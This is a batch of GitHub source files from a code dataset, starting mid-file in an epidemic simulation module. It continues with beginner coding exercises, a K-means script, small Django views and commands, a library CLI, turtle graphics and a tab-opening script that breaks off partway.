asked to stop\n elapsed = sc.toc(T, output=True)\n if self['timelimit'] and elapsed > self['timelimit']:\n sc.printv(f\"Time limit ({self['timelimit']} s) exceeded\", 1, verbose)\n break\n elif self['stopping_func'] and self['stopping_func'](self):\n sc.printv(\"Stopping function terminated the simulation\", 1, verbose)\n break\n if self.t == until: # If until is specified, just stop here\n return\n\n # End of time loop; compute cumulative results outside of the time loop\n self.finalize(verbose=verbose) # Finalize the results\n sc.printv(f'Run finished after {elapsed:0.2f} s.\\n', 1, verbose)\n if do_plot: # Optionally plot\n self.plot(**kwargs)\n\n return self.results\n\n\n def finalize(self, verbose=None):\n ''' Compute final results, likelihood, etc. '''\n\n # Scale the results\n for reskey in self.result_keys():\n if self.results[reskey].scale == 'dynamic':\n self.results[reskey].values *= self.rescale_vec\n elif self.results[reskey].scale == 'static':\n self.results[reskey].values *= self['pop_scale']\n\n # Calculate cumulative results\n for key in cvd.result_flows.keys():\n self.results[f'cum_{key}'].values[:] = np.cumsum(self.results[f'new_{key}'].values)\n self.results['cum_infections'].values += self['pop_infected']*self.rescale_vec[0] # Include initially infected people\n\n # Perform calculations on results\n self.compute_results()\n\n # Convert results to a odicts/objdict to allow e.g. 
sim.results.diagnoses\n self.results = sc.objdict(self.results)\n self.results_ready = True\n self.initialized = False # To enable re-running\n\n return\n\n def compute_results(self, verbose=None):\n ''' Perform final calculations on the results '''\n self.compute_doubling()\n self.compute_r_eff()\n self.compute_likelihood()\n self.compute_summary(verbose=verbose)\n return\n\n\n def compute_doubling(self, window=3, max_doubling_time=30):\n '''\n Calculate doubling time using exponential approximation -- a more detailed\n approach is in utils.py. Compares infections at time t to infections at time\n t-window, and uses that to compute the doubling time. For example, if there are\n 100 cumulative infections on day 12 and 200 infections on day 19, doubling\n time is 7 days.\n\n Args:\n window (float): the size of the window used (larger values are more accurate but less precise)\n max_doubling_time (float): doubling time could be infinite, so this places a bound on it\n\n Returns:\n doubling_time (array): the doubling time results array\n '''\n cum_infections = self.results['cum_infections'].values\n self.results['doubling_time'][:window] = np.nan\n for t in range(window, self.npts):\n infections_now = cum_infections[t]\n infections_prev = cum_infections[t-window]\n r = infections_now/infections_prev\n if r > 1: # Avoid divide by zero\n doubling_time = window*np.log(2)/np.log(r)\n doubling_time = min(doubling_time, max_doubling_time) # Otherwise, it's unbounded\n self.results['doubling_time'][t] = doubling_time\n return self.results['doubling_time'].values\n\n\n def compute_r_eff(self, method='daily', smoothing=2, window=7):\n '''\n Effective reproductive number based on number of people each person infected.\n\n Args:\n method (str): 'instant' uses daily infections, 'infectious' counts from the date infectious, 'outcome' counts from the date recovered/dead\n smoothing (int): the number of steps to smooth over for the 'daily' method\n window (int): the size of the window used for 'infectious' and 'outcome' calculations (larger values are more accurate but less precise)\n\n Returns:\n r_eff (array): the r_eff results array\n '''\n\n # Initialize arrays to hold sources and targets infected each day\n sources = np.zeros(self.npts)\n targets = np.zeros(self.npts)\n window = int(window)\n\n # Default method -- calculate the daily infections\n if method == 'daily':\n\n # Find the dates that everyone became infectious and recovered, and hence calculate infectious duration\n recov_inds = self.people.defined('date_recovered')\n dead_inds = self.people.defined('date_dead')\n date_recov = self.people.date_recovered[recov_inds]\n date_dead = self.people.date_dead[dead_inds]\n date_outcome = np.concatenate((date_recov, date_dead))\n inds = np.concatenate((recov_inds, dead_inds))\n date_inf = self.people.date_infectious[inds]\n mean_inf = date_outcome.mean() - date_inf.mean()\n\n # Calculate R_eff as the mean infectious duration times the number of new infectious divided by the number of infectious people on a given day\n values = mean_inf*self.results['new_infections'].values/(self.results['n_infectious'].values+1e-6)\n if len(values) >= 3: # Can't smooth arrays shorter than this\n values = sc.smooth(values, smoothing)\n\n # Alternate (traditional) method -- count from the date of infection or outcome\n elif method in ['infectious', 'outcome']:\n\n for t in self.tvec:\n\n # Sources are easy -- count up the arrays\n if method == 'infectious':\n inds = cvu.true(t == self.people.date_infectious) # Find people 
who became infectious on this timestep\n elif method == 'outcome':\n recov_inds = cvu.true(t == self.people.date_recovered) # Find people who recovered on this timestep\n dead_inds = cvu.true(t == self.people.date_dead) # Find people who died on this timestep\n inds = np.concatenate((recov_inds, dead_inds))\n sources[t] = len(inds)\n\n # Targets are hard -- loop over the transmission tree\n for ind in inds:\n targets[t] += len(self.people.transtree.targets[ind])\n\n # Populate the array -- to avoid divide-by-zero, skip indices that are 0\n inds = sc.findinds(sources>0)\n r_eff = np.zeros(self.npts)*np.nan\n r_eff[inds] = targets[inds]/sources[inds]\n\n # Use stored weights calculate the moving average over the window of timesteps, n\n num = np.nancumsum(r_eff * sources)\n num[window:] = num[window:] - num[:-window]\n den = np.cumsum(sources)\n den[window:] = den[window:] - den[:-window]\n\n # Avoid dividing by zero\n values = np.zeros(num.shape)*np.nan\n ind = den > 0\n values[ind] = num[ind]/den[ind]\n\n # Method not recognized\n else:\n errormsg = f'Method must be \"daily\", \"infected\", or \"outcome\", not \"{method}\"'\n raise ValueError(errormsg)\n\n # Set the values and return\n self.results['r_eff'].values[:] = values\n\n return self.results['r_eff'].values\n\n\n def compute_gen_time(self):\n '''\n Calculate the generation time (or serial interval). There are two\n ways to do this calculation. The 'true' interval (exposure time to\n exposure time) or 'clinical' (symptom onset to symptom onset).\n\n Returns:\n gen_time (dict): the generation time results\n '''\n\n intervals1 = np.zeros(len(self.people))\n intervals2 = np.zeros(len(self.people))\n pos1 = 0\n pos2 = 0\n targets = self.people.transtree.targets\n date_exposed = self.people.date_exposed\n date_symptomatic = self.people.date_symptomatic\n for p in range(len(self.people)):\n if len(targets[p])>0:\n for target in targets[p]:\n target_ind = target['target']\n intervals1[pos1] = date_exposed[target_ind] - date_exposed[p]\n pos1 += 1\n if not np.isnan(date_symptomatic[p]):\n if not np.isnan(date_symptomatic[target_ind]):\n intervals2[pos2] = date_symptomatic[target_ind] - date_symptomatic[p]\n pos2 += 1\n\n self.results['gen_time'] = {\n 'true': np.mean(intervals1[:pos1]),\n 'true_std': np.std(intervals1[:pos1]),\n 'clinical': np.mean(intervals2[:pos2]),\n 'clinical_std': np.std(intervals2[:pos2])}\n return self.results['gen_time']\n\n\n def compute_likelihood(self, weights=None, verbose=None, eps=1e-16):\n '''\n Compute the log-likelihood of the current simulation based on the number\n of new diagnoses.\n\n Args:\n weights (dict): the relative wieght to place on each result\n verbose (bool): detail to print\n eps (float): to avoid divide-by-zero errors\n\n Returns:\n loglike (float): the log-likelihood of the model given the data\n '''\n\n if verbose is None:\n verbose = self['verbose']\n\n if weights is None:\n weights = {}\n\n if self.data is None:\n return np.nan\n\n loglike = 0\n\n model_dates = self.datevec.tolist()\n\n for key in set(self.result_keys()).intersection(self.data.columns): # For keys present in both the results and in the data\n weight = weights.get(key, 1) # Use the provided weight if present, otherwise default to 1\n for d, datum in self.data[key].iteritems():\n if np.isfinite(datum):\n if d in model_dates:\n estimate = self.results[key][model_dates.index(d)]\n if np.isfinite(datum) and np.isfinite(estimate):\n if (datum == 0) and (estimate == 0):\n p = 1.0\n else:\n p = cvm.poisson_test(datum, 
estimate)\n p = max(p, eps)\n logp = pl.log(p)\n loglike += weight*logp\n sc.printv(f' {d}, data={datum:3.0f}, model={estimate:3.0f}, log(p)={logp:10.4f}, loglike={loglike:10.4f}', 2, verbose)\n\n self.results['likelihood'] = loglike\n\n sc.printv(f'Likelihood: {loglike}', 1, verbose)\n return loglike\n\n\n def compute_summary(self, verbose=None):\n ''' Compute the summary statistics to display at the end of a run '''\n\n if verbose is None:\n verbose = self['verbose']\n\n summary = sc.objdict()\n summary_str = 'Summary:\\n'\n for key in self.result_keys():\n summary[key] = self.results[key][-1]\n if key.startswith('cum_'):\n summary_str += f' {summary[key]:5.0f} {self.results[key].name.lower()}\\n'\n sc.printv(summary_str, 1, verbose)\n self.summary = summary\n\n return summary\n\n\n def plot(self, *args, **kwargs):\n '''\n Plot the results of a single simulation.\n\n Args:\n to_plot (dict): Dict of results to plot; see get_sim_plots() for structure\n do_save (bool): Whether or not to save the figure\n fig_path (str): Path to save the figure\n fig_args (dict): Dictionary of kwargs to be passed to pl.figure()\n plot_args (dict): Dictionary of kwargs to be passed to pl.plot()\n scatter_args (dict): Dictionary of kwargs to be passed to pl.scatter()\n axis_args (dict): Dictionary of kwargs to be passed to pl.subplots_adjust()\n legend_args (dict): Dictionary of kwargs to be passed to pl.legend()\n as_dates (bool): Whether to plot the x-axis as dates or time points\n dateformat (str): Date string format, e.g. '%B %d'\n interval (int): Interval between tick marks\n n_cols (int): Number of columns of subpanels to use for subplot\n font_size (int): Size of the font\n font_family (str): Font face\n grid (bool): Whether or not to plot gridlines\n commaticks (bool): Plot y-axis with commas rather than scientific notation\n setylim (bool): Reset the y limit to start at 0\n log_scale (bool): Whether or not to plot the y-axis with a log scale; if a list, panels to show as log\n do_show (bool): Whether or not to show the figure\n colors (dict): Custom color for each result, must be a dictionary with one entry per result key in to_plot\n sep_figs (bool): Whether to show separate figures for different results instead of subplots\n fig (fig): Handle of existing figure to plot into\n\n Returns:\n fig: Figure handle\n\n\n **Example**::\n\n sim = cv.Sim()\n sim.run()\n sim.plot()\n '''\n fig = cvplt.plot_sim(sim=self, *args, **kwargs)\n return fig\n\n\n def plot_result(self, key, *args, **kwargs):\n '''\n Simple method to plot a single result. Useful for results that aren't\n standard outputs. 
See sim.plot() for explanation of other arguments.\n\n Args:\n key (str): the key of the result to plot\n\n **Examples**::\n\n sim.plot_result('r_eff')\n '''\n fig = cvplt.plot_result(sim=self, key=key, *args, **kwargs)\n return fig","repo_name":"bosetinsky/eswatini-covasim","sub_path":"covasim/sim.py","file_name":"sim.py","file_ext":"py","file_size_in_byte":35094,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"16317173471","text":"#1.Write a method, that will get an integer array as parameter and will process every number from this array.\r\n#Return a new array with processing every number of the input-array like this:\r\n#If the number has an integer square root, take this, otherwise square the number.\r\n\r\n\r\nimport math\r\ndef square_or_square_root(arr):\r\n for item in range(len(arr)):\r\n if math.sqrt(arr[item]) % 1 == 0:\r\n arr[item] = int(math.sqrt(arr[item]))\r\n else:\r\n arr[item] = arr[item] * arr[item]\r\n\r\n print(arr)\r\n\r\n#square_or_square_root([3,4,9,2])\r\n\r\nprint(math.sqrt(3))\r\n\r\n#2.Complete the square sum function so that it squares each number passed into it and then sums the results together.\r\n\r\ndef square_sum(numbers):\r\n suma = 0\r\n for item in range(len(numbers)):\r\n suma = suma + numbers[item] * numbers[item]\r\n\r\n print(suma)\r\n\r\n#square_sum([1,2,2])\r\n\r\n#3.Create a function that returns the CSV representation of a two-dimensional numeric array.\r\nfrom array import *\r\ndef to_csv_text(array):\r\n new_string = \"\"\r\n for rows in range(len(array)):\r\n for cols in range(len(array[rows])):\r\n print(array[rows][cols] , end = ' ' )\r\n print(\"\\n\")\r\n\r\n\r\n\r\narray = [[ 0, 1, 2, 3, 4 ], [ 10,11,12,13,14 ], [ 20,21,22,23,24 ], [ 30,31,32,33,34 ]]\r\nprint (array[0])\r\n#to_csv_text(array)\r\n\r\n\r\n#4.Write a function that returns a string in which firstname is swapped with last name.\r\n#def name_shuffler(str_):\r\nnume = \"ala bala\"\r\nnume1 = nume.split(\" \")\r\n\r\nfor i in range(int(len(nume1)-1)):\r\n a = nume1[i]\r\n nume1[i] = str(nume1[i+1])\r\n b = str(a)\r\n new_string = nume1[i] + \" \" + b\r\n\r\nprint (new_string)\r\n\r\n\r\n#5.We want to know the index of the vowels in a given word, for example, there are two vowels\r\n# in the word super (the second and fourth letters).\r\n\r\n#So given a string \"super\", we should return a list of [2, 4].\r\ndef vowel_indices(word):\r\n lista=[]\r\n word = word.lower()\r\n for i in range(len(word)):\r\n if word[i] in \"aeiou\":\r\n lista.append(i+1)\r\n print(lista)\r\nvowel_indices(\"UNDISARMED\")\r\nword = \"UNDISARMED\"\r\n#print(word.lower())\r\n\r\n\r\n\r\n#6.Take an array and remove every second element from the array. 
Always keep the first element and start removing with the next element.\r\ndef remove_every_other(my_list):\r\n new_list=[]\r\n for i in range(len(my_list)):\r\n if i % 2 == 0:\r\n new_list.append(my_list[i])\r\n\r\n print(new_list)\r\n\r\n#remove_every_other([\"Keep\", \"Remove\",\"Keep\", \"Remove\",\"Keep\", \"Remove\",\"Keep\", \"Remove\"])\r\n\r\n#7.Simple, remove the spaces from the string, then return the resultant string\r\ndef no_space(x):\r\n new_str = \"\"\r\n for c in range(len(x)) :\r\n if x[c] != \" \":\r\n new_str = new_str + x[c]\r\n\r\n print(new_str)\r\nno_space(\"aa b b\")\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Mizil/CodeWars","sub_path":"CodeWars.py","file_name":"CodeWars.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"31589193856","text":"from DataPoints import DataPoints\r\nfrom Plotter import Plotter\r\nimport random\r\nimport sys\r\nimport math\r\n\r\n\r\ndef sqrt(n):\r\n return math.sqrt(n)\r\n\r\n\r\nclass Centroid:\r\n def __init__(self, x, y):\r\n self.x = x\r\n self.y = y\r\n\r\n def __eq__(self, other):\r\n if not type(other) is type(self):\r\n return False\r\n if other is self:\r\n return True\r\n if other is None:\r\n return False\r\n if self.x != other.x:\r\n return False\r\n if self.y != other.y:\r\n return False\r\n return True\r\n\r\n def __ne__(self, other):\r\n result = self.__eq__(other)\r\n if result is NotImplemented:\r\n return result\r\n return not result\r\n\r\n def toString(self):\r\n return \"Centroid [x=\" + str(self.x) + \", y=\" + str(self.y) + \"]\"\r\n\r\n def __str__(self):\r\n return self.toString()\r\n\r\n def __repr__(self):\r\n return self.toString()\r\n\r\n\r\nclass KMeans:\r\n def __init__(self):\r\n self.K = 0 # num of labels / clusters\r\n\r\n def main(self, args):\r\n seed = 71\r\n\r\n dataSet = self.readDataSet(\"dataset1.txt\")\r\n self.K = DataPoints.getNoOFLabels(dataSet)\r\n random.Random(seed).shuffle(dataSet)\r\n self.kmeans(dataSet)\r\n\r\n print(\"\")\r\n dataSet = self.readDataSet(\"dataset2.txt\")\r\n self.K = DataPoints.getNoOFLabels(dataSet)\r\n random.Random(seed).shuffle(dataSet)\r\n self.kmeans(dataSet)\r\n\r\n print(\"\")\r\n dataSet = self.readDataSet(\"dataset3.txt\")\r\n self.K = DataPoints.getNoOFLabels(dataSet)\r\n random.Random(seed).shuffle(dataSet)\r\n self.kmeans(dataSet)\r\n\r\n def kmeans(self, dataSet):\r\n clusters = []\r\n k = 0\r\n while k < self.K:\r\n cluster = set()\r\n clusters.append(cluster)\r\n k += 1\r\n\r\n # Initially randomly assign points to clusters\r\n i = 0\r\n for point in dataSet:\r\n clusters[i % k].add(point)\r\n i += 1\r\n\r\n # calculate centroid for clusters\r\n centroids = []\r\n for j in range(self.K):\r\n centroids.append(self.getCentroid(clusters[j]))\r\n\r\n self.reassignClusters(dataSet, centroids, clusters)\r\n\r\n # continue till convergence\r\n iteration = 0\r\n while True:\r\n iteration += 1\r\n\r\n # calculate centroid for clusters\r\n centroidsNew = []\r\n for j in range(self.K):\r\n centroidsNew.append(self.getCentroid(clusters[j]))\r\n\r\n # check convergence\r\n isConverge = True\r\n for j in range(self.K):\r\n if centroidsNew[j] != centroids[j]:\r\n isConverge = False\r\n if isConverge:\r\n break\r\n\r\n self.reassignClusters(dataSet, centroidsNew, clusters)\r\n for j in range(self.K):\r\n centroids[j] = centroidsNew[j]\r\n\r\n print(\"Iteration :\" + str(iteration))\r\n # Calculate purity\r\n maxLabelCluster = []\r\n for j in range(self.K):\r\n 
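# size of the most common true label in cluster j (the numerator of purity)\r\n 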
maxLabelCluster.append(self.getMaxClusterLabel(clusters[j]))\r\n purity = 0.0\r\n for j in range(self.K):\r\n purity += maxLabelCluster[j]\r\n purity /= len(dataSet)\r\n print(\"Purity is :\" + str(purity))\r\n\r\n noOfLabels = DataPoints.getNoOFLabels(dataSet)\r\n nmiMatrix = DataPoints.getNMIMatrix(clusters, noOfLabels)\r\n nmi = DataPoints.calcNMI(nmiMatrix)\r\n print(\"NMI :\" + str(nmi))\r\n\r\n # plot the result\r\n Plotter.plot(clusters)\r\n\r\n def reassignClusters(self, dataSet, c, clusters):\r\n for j in range(self.K):\r\n clusters[j] = set()\r\n\r\n dist = [0.0 for x in range(self.K)]\r\n for point in dataSet:\r\n for i in range(self.K):\r\n dist[i] = self.getEuclideanDist(point.x, point.y, c[i].x, c[i].y)\r\n\r\n minIndex = self.getMinIndex(dist)\r\n clusters[minIndex].add(point)\r\n\r\n def getMinIndex(self, dist):\r\n min_ = sys.maxsize\r\n minIndex = -1\r\n for i in range(len(dist)):\r\n if dist[i] < min_:\r\n min_ = dist[i]\r\n minIndex = i\r\n return minIndex\r\n\r\n def getEuclideanDist(self, x1, y1, x2, y2):\r\n dist = sqrt(pow((x2 - x1), 2) + pow((y2 - y1), 2))\r\n return dist\r\n\r\n def getCentroid(self, cluster):\r\n x_sum, y_sum = 0.0, 0.0\r\n size = len(cluster)\r\n for p in cluster:\r\n x_sum += p.x\r\n y_sum += p.y\r\n\r\n return Centroid(x_sum / size, y_sum / size)\r\n\r\n @staticmethod\r\n def getMaxClusterLabel(cluster):\r\n labelCounts = {}\r\n for point in cluster:\r\n if point.label not in labelCounts:\r\n labelCounts[point.label] = 0\r\n labelCounts[point.label] += 1\r\n max = -sys.maxsize - 1\r\n for label in labelCounts:\r\n if max < labelCounts[label]:\r\n max = labelCounts[label]\r\n return max\r\n\r\n @staticmethod\r\n def readDataSet(filePath):\r\n dataSet = []\r\n with open(filePath) as f:\r\n lines = f.readlines()\r\n lines = [x.strip() for x in lines]\r\n for line in lines:\r\n points = line.split('\\t')\r\n x = float(points[0])\r\n y = float(points[1])\r\n label = int(points[2])\r\n point = DataPoints(x, y, label)\r\n dataSet.append(point)\r\n return dataSet\r\n\r\n\r\nif __name__ == \"__main__\":\r\n k = KMeans()\r\n k.main(None)\r\n","repo_name":"shunjizhan/clustering","sub_path":"KMeans.py","file_name":"KMeans.py","file_ext":"py","file_size_in_byte":5580,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"18304058576","text":"from django.core.management.base import BaseCommand\n\nfrom newsletter.models import Client\nfrom newsletter.services.email import send_newsletter_email\n\n\nclass Command(BaseCommand):\n help = \"Send the newsletter to subscribers\"\n\n def add_arguments(self, parser):\n parser.add_argument(\n \"-b\", \"--batch\", type=int, help=\"How many emails should be sent in one go?\"\n )\n\n def handle(self, *args, **kwargs):\n subscribed_clients = Client.objects.subscribed()\n batch_size = kwargs[\"batch\"]\n if batch_size:\n send_newsletter_email(subscribed_clients, batch_size)\n else:\n send_newsletter_email(subscribed_clients)\n self.stdout.write(\"Newsletter has been sent to subscribers\")\n","repo_name":"osamahasanone/payla","sub_path":"app/newsletter/management/commands/sendnewsletter.py","file_name":"sendnewsletter.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"32862362606","text":"import string_utils\nimport updateProcedures\nimport fetchProcedures\nimport addProcedures\nimport deleteProcedures\n\ndef start(self):\n print(\"What would you like to do?\\n\")\n 
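# read the menu selection; anything other than 1-3 re-prompts via the recursive call below\n 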
self.choice = input(\"1) Add Borrower\\n2) Update Borrower\\n3) Delete Borrower\\n\")\n if self.choice == \"1\":\n add_borrower(self)\n elif self.choice == \"2\":\n update_borrower(self)\n elif self.choice == \"3\":\n delete_borrower(self)\n else:\n print(\"Must enter a valid option (ie 1, 2, 3)\")\n start(self)\n\ndef add_borrower(self):\n self.store[\"name\"] = input(\"What is the name of your new borrower\\n\")\n self.store[\"address\"] = input(\"What's the address of your borrower\\n\")\n self.store[\"phone\"] = input(\"Lastly, what is the phone number of your borrower\\n\")\n addProcedures.addBorrower(self.store[\"name\"],self.store[\"address\"],self.store[\"phone\"])\n\ndef update_borrower(self):\n borrowerList=fetchProcedures.fetchBorrowers()\n borrowers = string_utils.display_input_options(borrowerList)\n borrowerChoice=input(borrowers+\" Enter borrower card # you want to update?\\n\")\n bNewName=input(\"Enter the borrowers new name.\\n\")\n bNewAddress=input(\"Enter \"+bNewName+\" new address.\\n\")\n bNewPhone=input(\"Enter \"+bNewName+\" new phone number. \\n\")\n updateProcedures.updateBorrowerInfo(borrowerChoice,bNewName,bNewAddress,bNewPhone)\n print(\"Updating Borrower\")\n\ndef delete_borrower(self):\n borrowerList=fetchProcedures.fetchBorrowers()\n borrowers = string_utils.display_input_options(borrowerList)\n borrowerChoice=input(borrowers+\" Enter borrower card # you want to delete?\\n\")\n deleteProcedures.deleteBorrower(borrowerChoice)\n print(\"Deleting Borrower\")","repo_name":"WillCaoSmoothstack/Week1Project","sub_path":"admin_q_borrower.py","file_name":"admin_q_borrower.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"44117268984","text":"import json\nimport uuid\n\nfrom django.http import HttpResponse, HttpResponseServerError, HttpResponseNotFound\nfrom rest_framework.decorators import api_view\n\nfrom score.models import Score\n\n\n@api_view(['POST'])\ndef update(request):\n try:\n json_data = json.loads(request.body)\n user_id = uuid.UUID(json_data['userId'])\n score = Score.objects.get(userId=user_id)\n # use .get() so omitted fields stay None instead of raising KeyError,\n # matching the intent of the None checks below\n if json_data.get('coin') is not None:\n score.coin = json_data['coin']\n if json_data.get('gem') is not None:\n score.gem = json_data['gem']\n if json_data.get('cup') is not None:\n score.cup = json_data['cup']\n if json_data.get('score') is not None:\n score.score = json_data['score']\n if json_data.get('level') is not None:\n score.level = json_data['level']\n if json_data.get('rank') is not None:\n score.rank = json_data['rank']\n if json_data.get('xp') is not None:\n score.xp = json_data['xp']\n if json_data.get('fan') is not None:\n score.fan = json_data['fan']\n score.save()\n return HttpResponse(json.dumps({\"status\": \"success\"}))\n except (KeyError, ValueError, json.decoder.JSONDecodeError):\n return HttpResponseServerError(json.dumps({\"status\": \"badRequest\", \"error\": \"Malformed data\"}))\n except Score.DoesNotExist:\n return HttpResponseNotFound(json.dumps({\"status\": \"doesNotExist\", \"error\": \"Score does not exist\"}))\n","repo_name":"hsarraf/casualkit-django-server","sub_path":"score/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"15949848500","text":"# file mode handling\n\n# for opening file:\n# Function: open(param1, param2, param3)\n\n# param1: file name\n# param2: access mode\n# param3: Buffering\n\n# file opening and 
read\n\nopen_file = open('test.txt')\nfile_read = open_file.read()\nprint('Read a file',file_read)\nopen_file.close()\n\n\n# file write\n\nwrite_file = open('test_1.txt', mode='w+' )\nwrite_file.write('I am learing python programming')\nwrite_file.seek(0)\nprint(write_file.read())\nwrite_file.close()\n\n# write_new_file = open('test_2.txt', 'w')\n# write_new_file.write('line number one !')\n# print(\"write test_2::\"write_new_file.read())\n# write_new_file.close()\n\n# file Append\n\nappend_file = open(\"test_2.txt\", 'a')\nappend_file.write(\"\\n Hello python append methods\")\nprint(append_file)\nappend_file.close()\n\n\n# Using with\n\nwith open('test.txt', mode='r') as f:\n file_data = f.read()\n print(file_data)\n\n# using readline\n\nwith open(\"test.txt\", 'r') as f:\n lines = f.readlines()\n print(lines)\n print('\\n', lines[1])\n ","repo_name":"Habibur-Rahman0927/1_months_Python_Crouse","sub_path":"Python All Day Work/04-05-2021 Days Work/Task_2_file_mode_use.py","file_name":"Task_2_file_mode_use.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27782991623","text":"import turtle\r\nfrom tkinter import *\r\nimport time\r\nfrom PIL import ImageGrab, Image\r\nimport random\r\n\r\n\r\ndef get_pixel(widget, x, y):\r\n\tImageGrab.grab().crop((x, y, x + 1, y + 1)).save(\"C:\\\\Users\\\\Tate\\\\Desktop\\\\image.png\")\r\n\r\n\r\ndef get_pixel_color(pixel):\r\n\tim = Image.open(\"C:\\\\Users\\\\Tate\\\\Desktop\\\\image.png\")\r\n\tpix = im.load()\r\n\trgb = pix[0, 0]\r\n\tprint(rgb)\r\n\tif sum(list(rgb)) < 128:\r\n\t\treturn \"black\"\r\n\telif rgb == (255, 255, 255):\r\n\t\treturn \"white\"\r\n\telif rgb == (255, 0, 0):\r\n\t\treturn \"red\"\r\n\telif rgb == (0, 0, 255):\r\n\t\treturn \"blue\"\r\n\telif rgb == (0, 128, 0):\r\n\t\treturn \"white\"\r\n\r\n\r\ndef square(t, length):\r\n\tfor i in range(4):\r\n\t\tt.fd(length)\r\n\t\tt.lt(90)\r\n\r\n\r\ndef polyline(t, length, n, angle):\r\n\tfor i in range(int(n)):\r\n\t\tt.fd(length)\r\n\t\t\"\"\"\r\n\t\tx = t.xcor() + 43\r\n\t\ty = -t.ycor() + 77\r\n\t\tcolor = get_pixel_color(get_pixel(canvas, x, y))\r\n\t\tif color == \"red\":\r\n\t\t\tt.rt(angle)\r\n\t\t\tt.fillcolor(\"green\")\r\n\t\telif color == \"green\":\r\n\t\t\tt.lt(angle)\r\n\t\t\tt.fillcolor(\"blue\")\r\n\t\telif color == \"blue\":\r\n\t\t\tt.rt(angle)\r\n\t\t\tt.fillcolor(\"red\")\r\n\t\telif color == \"black\":\r\n\t\t\tt.fd(10)\r\n\t\t\tflower(t, random.randint(100,200), 5, 30)\r\n\t\t\"\"\"\r\n\t\tt.lt(angle)\r\n\r\n\r\ndef polygon(t, length, n):\r\n\tangle = 360.0 / n\r\n\tpolyline(t, length, n, angle)\r\n\r\n\r\ndef circle(t, r, n):\r\n\tc = 2 * 3.1415926 * r\r\n\tpolygon(t, c / n, n)\r\n\r\n\r\ndef arc(t, r, angle):\r\n\tarc_length = 2 * 3.141526 * r * abs(angle) / 360\r\n\tn = int(arc_length / 4) + 3\r\n\tstep_length = arc_length / n\r\n\tstep_angle = float(angle) / n\r\n\r\n\tt.lt(step_angle / 2)\r\n\tpolyline(t, step_length, n, step_angle)\r\n\tt.rt(step_angle / 2)\r\n\r\n\r\ndef flower(t, r, n, angle):\r\n\tif n != nmax:\r\n\t\tt.fd(r*2)\r\n\t\theading = t.heading()\r\n\tfor i in range(int(n)):\r\n\t\tif i % 2 == 0:\r\n\t\t\tt.fillcolor(\"blue\")\r\n\t\telse:\r\n\t\t\tt.fillcolor(\"green\")\r\n\t\tpetal(t, r, n, angle)\r\n\t\tt.lt(360.0 / n)\r\n\t\tt.lt(180-angle)\r\n\tif n != nmax:\r\n\t\tt.setheading(heading)\r\n\t\tt.bk(r*2)\r\n\r\n\r\n\r\n\r\ndef petal(t, r, n, angle):\r\n\tif n == 6:\r\n\t\tt.fillcolor(\"purple\")\r\n\telif n == 
5:\r\n\t\tt.fillcolor(\"indigo\")\r\n\telif n == 4:\r\n\t\tt.fillcolor(\"navy\")\r\n\telif n == 3:\r\n\t\tt.fillcolor(\"sea green\")\r\n\telif n == 2:\r\n\t\tt.fillcolor(\"goldenrod\")\r\n\tt.begin_fill()\r\n\r\n\tarc(t, r, angle)\r\n\theading = t.heading()\r\n\tx = t.xcor()\r\n\ty = t.ycor()\r\n\tt.lt(180 - angle)\r\n\tarc(t, r, angle)\r\n\tt.end_fill()\r\n\tt.up()\r\n\tt.goto(x,y)\r\n\tt.down()\r\n\tt.setheading(heading)\r\n\tif r >= 5:\r\n\t\tflower(t, r / 3, n - 1, angle)\r\n\r\n\tarc(t, r, angle)\r\n\r\n\r\n\r\nroot = Tk()\r\nroot.withdraw()\r\nbob = turtle.Turtle()\r\ncanvas = turtle.getcanvas()\r\nscreen_width = 1200\r\nscreen_height = 1200\r\nbob.screen.setup(screen_width, screen_height, 0, 0)\r\nbob.screen.setworldcoordinates(0, -screen_height, screen_width, 0)\r\n# bob.hideturtle()\r\nbob.speed(0)\r\nbob.up()\r\nbob.goto(screen_width / 2, -7*screen_height / 8)\r\nbob.down()\r\n# n=11, rmin=50, r/2, n-1\r\nnmax = 5\r\nflower(bob, 200, nmax, 75)\r\n\r\nturtle.mainloop()\r\n","repo_name":"tate-jenkins/CS290","sub_path":"flower_abstract.py","file_name":"flower_abstract.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"10661558756","text":"\"\"\"\r\n-------------------------------------------------------\r\n[Simple Browser Spammer]\r\n-------------------------------------------------------\r\nAuthor: Luka Senfner\r\nID: 210729560\r\nEmail: senfl5620@gmail.com\r\n__updated__ = \"2022-02-15\"\r\n-------------------------------------------------------\r\n\"\"\"\r\n# Imports\r\nimport webbrowser\r\nfrom time import sleep\r\nfrom platform import system\r\n\r\n\r\ndef getos():\r\n os_type = system()\r\n browser(os_type)\r\n\r\n\r\ndef browser(os_type):\r\n if os_type == 'Windows':\r\n os_default = 'windows-default'\r\n elif os_type == 'Darwin':\r\n os_default = 'macosx'\r\n else:\r\n os_default = None # fall back to the system default browser on other platforms\r\n URL = str(input(\"Paste the URL of the website you want to go to: \"))\r\n num_times_open = int(\r\n input(\"How many times do you want the link to open in a new tab?: \"))\r\n\r\n if num_times_open > 0:\r\n webbrowser.get(os_default).open_new(URL)\r\n else:\r\n print(\"You broke me! 
